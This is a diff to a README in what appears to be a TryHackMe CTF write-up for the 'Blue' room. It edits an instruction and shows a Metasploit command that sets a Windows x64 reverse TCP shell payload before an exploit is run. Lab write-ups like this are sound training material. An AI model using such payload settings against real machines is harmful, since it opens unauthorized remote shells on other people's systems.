ollijri/TryHackMe-CTF-Write-Ups/Blue/README.md

 ____________________________________________________________________________________________________________________

-Before running the exploit, make sure to run the following command as by default it will load meterpreter:
+Before running the exploit, make sure to run the following command as by default it will load meterpreter and a follow up question requires converting shell to meterpreter shell.

 ``` set payload windows/x64/shell/reverse_tcp ```